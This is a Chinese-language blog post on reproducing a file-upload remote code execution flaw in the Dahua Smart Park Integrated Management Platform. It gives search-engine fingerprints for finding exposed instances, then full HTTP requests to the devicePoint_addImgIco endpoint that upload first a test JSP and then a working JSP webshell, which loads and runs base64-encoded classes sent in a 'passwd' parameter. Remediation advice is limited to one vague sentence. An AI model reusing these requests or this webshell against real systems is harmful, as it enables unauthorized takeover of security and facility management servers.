大华智慧园区综合管理平台RCE漏洞
发布时间
阅读量:
阅读量
大华智慧园区综合管理平台RCE漏洞
-
一、产品简介:介绍产品的基本功能与核心特性。
- 二、漏洞概述:对存在的漏洞进行系统性分析与详细说明。
- 三、复现环境:描述实现漏洞复现所需的硬件与软件配置细节。
- 四、漏洞复现:列举具体的漏洞及其潜在的影响因素。
小龙POC脚本:
- 上传一个特定的样本文件用于测试操作。
- 进行连接验证测试以确保系统的安全性与稳定性。
- 五、 修复建议
一、 产品简介
大华智慧园区综合管理系统
二、 漏洞概述
大华智慧园区设备提供了文件上传服务, 未能对上传的文件类型大小格式及路径实施严格管控与过滤, 使攻击者能够创建恶意附件并将其发送至设备, 从而使得他们能够利用漏洞获取管理员权限并运行恶意代码
三、 复现环境
鹰图指纹:web.body=“/WPMS/asset/lib/gridster/”
fofa:body=“/WPMS/asset/lib/gridster/”
四、 漏洞复现
出现以上图片显示的情况,就说明存在漏洞
burp PoC 验证
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="a.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
test123
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
代码解释哈拉少一下
截图
验证url
文件上传后,这里端口被重定向到了8314这个端口
小龙POC脚本:
小龙POC传送门: 小龙POC工具 也是一阵热情的呼唤
上传一个马子
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="b.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
代码解释
尝试连接验证
五、 修复建议
对于相关系统用户而言,在及时补丁修复的同时实施访问权限控制措施以防止其大华智慧园区综合管理平台置于非受限或安全网络环境中
全部评论 (0)
还没有任何评论哟~